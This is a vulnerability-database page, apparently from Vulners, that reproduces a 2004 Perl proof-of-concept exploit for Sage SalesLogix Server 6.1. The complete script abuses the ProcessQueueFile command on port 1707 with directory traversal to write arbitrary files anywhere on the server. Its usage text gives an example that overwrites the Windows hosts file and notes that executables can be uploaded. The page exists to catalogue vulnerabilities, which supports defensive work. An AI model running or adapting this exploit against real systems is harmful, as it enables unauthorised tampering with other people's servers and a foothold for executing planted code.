Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SLX Server 6.1 Arbitrary File Creation Exploit (PoC)

🗓️ 18 Oct 2004 00:00:00Reported by Carl LivittType 
zdt
 zdt🔗 0day.today👁 15 Views

Exploit for SLX Server 6.1 allows arbitrary file creation using directory traversal technique.

Code
====================================================
SLX Server 6.1 Arbitrary File Creation Exploit (PoC)
====================================================

#!/usr/bin/perl
#
# Proof of concept exploit: Arbitrary file creation for SLX server 6.1
#
# Written by Carl Livitt, Agenda Security Services, June 2004.
#
# This exploit abuses the ProcessQueueFile command on SLX 6.1 (others?)
servers
# to create arbitrary files on the filesystem of the SLX server. By
using
# directory traversal, it is possible to escape from the Queue directory
and
# write anywhere on the SLX server's filesystem.
#

use IO::Socket;

print "slx_uploader - Uploads arbitrary files to Sage SalesLogix
servers.\n";
print "By Carl Livitt @ Agenda Security Services, June 2004\n\n";

if($#ARGV!=2) {
      print "Syntax: $0 host filename_to_create file_to_upload\n\n";
      print "Example:\n";
      print "  $0 10.0.0.100
\\\\winnt\\\\system32\\\\drivers\\\\etc\\\\hosts evil.txt\n\n";
      print "The above example would upload the local file 'evil.txt'
to the SLX\n";
      print "server on 10.0.0.100, overwriting the existing hosts
file.\n";
      print "It is possible to upload binary files, e.g. executables,
with this exploit.\n\n";

      exit(1);
} else {
      $host=$ARGV[0];
      $create_file=$ARGV[1];
      $upload_file=$ARGV[2];
}

if((stat($upload_file))[7] > 4096) {
      print "[*] Error! Files to be uploaded must be less than 4k in
size.\n\n";
      exit(1);
}

print "[+] Building payload\n";
$contentLen=43 + length($create_file);
$exploit="\x00"x10 . chr($contentLen) . "\x00"x3 .
"ProcessQueueFile\x00" . "..\\"x8 . "$create_file" . "\x00"x6;

open(UPLOAD, '<', $upload_file) || die "Could not open local file
$upload_file\n";

while(($line=<UPLOAD>)) {
      $exploit.=$line;
}

close(UPLOAD);

print "[+] Connecting to server $host:1707\n";
$sock=IO::Socket::INET->new("$host:1707") || do {print "[-] Could not
connect to server\n"; exit(1); };

print "[+] Sending exploit payload\n";
send($sock,$exploit,0);

print "[+] Waiting for response\n";
$sock->recv($data,1024,0);

if($data =~ /Received/) {
      print "[+] Exploit successful\n";
} else {
      print "[*] Exploit may not have worked.\n";
}

$sock->shutdown(2);

 

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Oct 2004 00:00Current
7.1High risk
Vulners AI Score7.1
slx serverarbitrary file creationdirectory traversalproof of conceptagenda security servicesexploit script
15